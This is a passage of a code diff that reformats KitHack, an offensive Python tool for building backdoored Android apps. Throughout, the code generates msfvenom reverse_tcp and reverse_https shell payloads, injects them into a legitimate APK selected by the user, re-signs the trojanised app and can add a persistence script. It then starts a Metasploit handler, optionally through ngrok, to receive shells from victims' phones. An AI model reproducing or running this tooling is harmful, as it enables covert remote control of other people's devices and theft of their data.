+ LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif m == '02': + elif m == "02": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk".format( + LPORT, LHOST + ) + ) location = os.getcwd() print( - "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + "{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( + APK, location + ) + ) print( - "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + os.system("apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif pay == '07': - print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + elif pay == "07": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) a = a.zfill(2) - if a == '01': + if a == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while ( + input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): break else: Tk().withdraw() icon = filedialog.askopenfilename( - title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", "*.*")), + ) print("\n{0}ICON: {1}".format(YELLOW, icon)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) file = open("/tmp/data.txt", "w") - file.write(icon + '\n') + file.write(icon + "\n") file.write(mainout) file.close() print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print( - "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk".format( + LHOST, LPORT + ) + ) + print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/payload -o output/kithack.apk') + os.system("apktool b output/payload -o output/kithack.apk") location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif a == '02': + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) print( - '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} Use the old Metasploit method'.format( - WHITE, YELLOW)) - print('{0}[02]{1} Use the new KitHack method'.format( - WHITE, YELLOW)) + "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) + ) + print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) - if m == '01': + if m == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk".format( + APK, LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif m == '02': + elif m == "02": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk".format( + LPORT, LHOST + ) + ) location = os.getcwd() print( - "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + "{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( + APK, location + ) + ) print( - "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + os.system("apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] 